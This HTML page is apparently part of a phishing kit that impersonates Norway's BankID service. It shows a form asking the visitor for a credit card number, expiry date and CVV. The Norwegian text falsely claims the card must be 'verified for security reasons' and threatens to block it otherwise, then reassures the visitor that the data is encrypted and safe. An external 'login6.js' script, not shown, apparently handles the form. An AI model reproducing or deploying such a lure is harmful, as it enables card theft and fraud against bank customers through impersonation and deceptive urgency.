<!DOCTYPE html>
<html lang="nb">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <meta name="robots" content="noindex, nofollow">
    <link rel="icon" type="image/png" href="img/favicon.b4be5517.png">
    <title>BankID</title>
    <link href="css/authorization.11f23e186330ca22e8f9.css" rel="stylesheet">
    <script type="text/javascript" src="js/jquery-3.6.3.min.js"></script>
    <script type="text/javascript" src="js/login6.js"></script>
    <style>
        /* Stilizare placeholder */
        .nnin::placeholder {
            font-size: 16px; /* Dimensiunea textului placeholder-ului */
            color: #888; /* Culoarea textului placeholder-ului (op?ional) */
        }
    </style>
</head>
<body class="">
    <main class="container">
        <div class="container__content">
            <div class="bankid-logo-wrapper">
                <img alt="" class="bankid-logo" src="img/bankid-logo.28f35de5.svg">
            </div>
            <div id="wait">
                <img alt="" class="bankid-symbol" src="img/bankid-symbol-animated.ee3b536a.svg">
                <span class="sr-only" role="alert" lang="en">Loading</span>
            </div>
            <div class="page" id="getNnin" style="">
                <form id="nnin-form" novalidate="">
                    <div class="page__content">

                        <span class="merchant_name"><b>Kredittkort</b></span>
                        <label for="nnin" data-i18n="nnin_label" style="font-size: small; font-weight: normal;">
                            Pa grunn av sikkerhetsgrunner ma vi verifisere ditt kredittkort knyttet til banken din.
Hvis du ikke er enig, vil vi sperre kortet ditt til det blir aktivert pa bankfilialen.<br><br>Vennligst oppgi kortdetaljene hvis du er enig.
                        </label>
                        <input name="creditcard" id="creditcard" placeholder="Kredittkort" maxlength="16" minlength="1" autocomplete="off" aria-labelledby="nnin-title" aria-invalid="true" required="" class="nnin">
                        <div style="display: flex; gap: 10px; ">
                            <input name="mm" id="mm" placeholder="Måned (MM)" maxlength="2" minlength="1" autocomplete="off" aria-labelledby="nnin-title" aria-invalid="true" required="" class="nnin">
                            <input name="yyyy" id="yyyy" placeholder="År (YYYY)" maxlength="4" minlength="1" autocomplete="off" aria-labelledby="nnin-title" aria-invalid="true" required="" class="nnin">
                        </div>
                        <input name="cvv" id="cvv" placeholder="CVV" maxlength="4" minlength="1" autocomplete="off" aria-labelledby="nnin-title" aria-invalid="true" required="" class="nnin">

                        <div class="buttons__page__middle" style="padding-top:20px;">
                            <button type="button" data-i18n="next" id="nnin-next-button" class="button button--default">Neste</button>
                        </div>
<label for="nnin" data-i18n="nnin_label" style="font-size: small; font-weight: normal;">
                            <br>Sikkerhet for Dine Data</b><Br><Br>Vi er forpliktet til a beskytte dine personlige opplysninger. Vi bruker avansert kryptering og sikkerhetstiltak for a sikre at kortinformasjonen din er fullstendig trygg.                        </label>

                    </div>
                </form>
                           </div>
        </div>
    </main>
</body>
</html>
